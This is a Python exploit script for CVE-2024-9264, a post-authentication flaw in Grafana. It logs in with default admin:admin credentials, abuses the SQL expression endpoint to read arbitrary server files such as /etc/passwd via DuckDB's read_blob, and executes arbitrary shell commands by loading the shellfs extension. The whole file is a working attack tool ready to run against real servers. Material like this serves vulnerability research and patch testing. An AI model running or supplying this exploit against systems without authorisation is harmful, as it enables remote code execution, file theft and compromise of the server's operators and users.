#!/usr/bin/env python3 # https://github.com/nollium/CVE-2024-9264/tree/main # - Requirements (install with pip): # ten # psycopg2-binary from ten import * from tenlib.flow.console import get_console from typing import cast, List, Dict, Optional, Any from psycopg2.extensions import adapt import sys # Force ten to output to stderr so the user can redirect the file output separately from the message log # E.g: python3 CVE-2024-9264.py -f /etc/passwd http://localhost:3000 > file.txt 2> logs.txt console = get_console() console.stderr = True @inform("Logging in with provided or default credentials") def authenticate(session: ScopedSession, user: str, password: str) -> None: path = "/login" data = {"password": password, "user": user} res = session.post(path, json=data) msg = res.json()["message"] if msg == "Logged in": msg_success(f"Logged in as {user}:{password}") else: failure(f"Failed to log in as {user}:{password}") @inform("Running duckdb query") def run_query(session: ScopedSession, query: str) -> Optional[List[Any]]: path = "/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101" data = { "from": "1729313027261", "queries": [ { "datasource": { "name": "Expression", "type": "__expr__", "uid": "__expr__", }, "expression": query, "hide": False, "refId": "B", "type": "sql", "window": "", } ], "to": "1729334627261", } res = session.post(path, json=data) data = cast(Dict, res.json()) # Check for DuckDB not found error if "results" in data and "B" in data["results"]: result = data["results"]["B"] if "error" in result and "no such file or directory" in result["error"]: failure("DuckDB is not installed on the target system. This exploit requires DuckDB to be present in the system PATH.") return None if data.get("message"): msg_failure("Received unexpected response:") msg_failure(json.encode(data, indent=4)) # prettify json return None try: values = data["results"]["B"]["frames"][0]["data"]["values"] values = cast(List, values) if len(values) == 0: failure("File not found") return None msg_success("Successfully ran duckdb query:") msg_success(f"{query}:") return values except (KeyError, IndexError): msg_failure("Unexpected response format:") msg_failure(json.encode(data, indent=4)) return None # Output's non-printable characters are unicode escaped def decode_output(values: List[str]) -> bytes: content = values[0][0] decoded = content.encode("utf-8").decode("unicode_escape").encode("latin1") return decoded def read_remote_file(session: ScopedSession, filepath: str) -> Optional[bytes]: """Read a file from the remote server using read_blob.""" escaped_filename = adapt(filepath) query = f"SELECT content FROM read_blob({escaped_filename})" result = run_query(session, query) if result: return decode_output(result) return None def execute_command(session: ScopedSession, command: str) -> Optional[bytes]: """Execute a command and return its output using shellfs.""" tmp_file = "/tmp/grafana_cmd_output" # Install and load shellfs if not already loaded full_query = ( "SELECT 1;" "install shellfs from community;" "LOAD shellfs;" f"SELECT * FROM read_csv('{command} >{tmp_file} 2>&1 |')" ) # Execute command and redirect output to a temporary file run_query(session, full_query) # Read the output file using the common function return read_remote_file(session, tmp_file) @entry @arg("url", "URL of the Grafana instance to exploit") @arg("user", "Username to log in as, defaults to 'admin'") @arg("password", "Password used to log in, defaults to 'admin'") @arg("file", "File to read on the server, defaults to '/etc/passwd'") @arg("query", "Optional query to run instead of reading a file") @arg("command", "Optional command to execute on the server") def main(url, user="admin", password="admin", file=None, query=None, command=None): """Exploit for Grafana post-auth file-read and RCE (CVE-2024-9264).""" if sum(1 for x in [file, query, command] if x is not None) > 1: failure("Cannot specify more than one of: file, query, or command arguments.") session = ScopedSession(base_url=url) authenticate(session, user, password) if command: msg_success(f"Executing command: {command}") output = execute_command(session, command) if output: console.file.flush() console.stderr = False bin_print(output) return if not query: file = file or "/etc/passwd" msg_success(f"Reading file: {file}") content = read_remote_file(session, file) if content: console.file.flush() console.stderr = False bin_print(content) return # Handle direct query execution content = run_query(session, query) if content: print(json.encode(content, indent=4)) # pylint: disable=no-value-for-parameter main()